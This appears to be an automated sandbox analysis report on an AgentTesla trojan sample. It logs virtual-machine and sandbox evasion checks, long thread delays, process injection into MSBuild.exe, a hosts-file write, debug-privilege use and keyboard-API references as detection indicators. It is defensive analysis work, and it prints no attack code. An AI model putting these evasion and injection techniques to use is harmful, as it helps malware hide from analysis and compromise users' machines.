                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6264 Thread sleep time: -45733s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe TID: 6280 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3216 Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380 Thread sleep count: 6084 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 3380 Thread sleep count: 2290 > 30
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 3104 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe TID: 6304 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 6084
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 2290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Thread delayed: delay time: 45733
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe Thread delayed: delay time: 922337203685477
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
                    Source: MSBuild.exe, 00000009.00000002.527123484.00000000012EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnito
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 9_2_067FC640 LdrInitializeThunk,9_2_067FC640
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 436000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 464000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D86008
                    Source: ykVBUY.exe.9.dr, Microsoft.Build/Shared/NativeMethodsShared.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 9.0.MSBuild.exe.400000.4.unpack, A/E1.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.1.unpack, A/E1.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.3.unpack, A/E1.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.2.unpack, A/E1.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.2.MSBuild.exe.400000.0.unpack, A/E1.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 9.0.MSBuild.exe.400000.0.unpack, A/E1.cs Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')
                    Source: 14.2.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: 14.0.ykVBUY.exe.550000.0.unpack, Microsoft.Build/Shared/NativeMethodsShared.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('OpenProcess', 'OpenProcess@KERNEL32.DLL'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: MSBuild.exe, 00000009.00000002.529853749.0000000003202000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: program manager
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
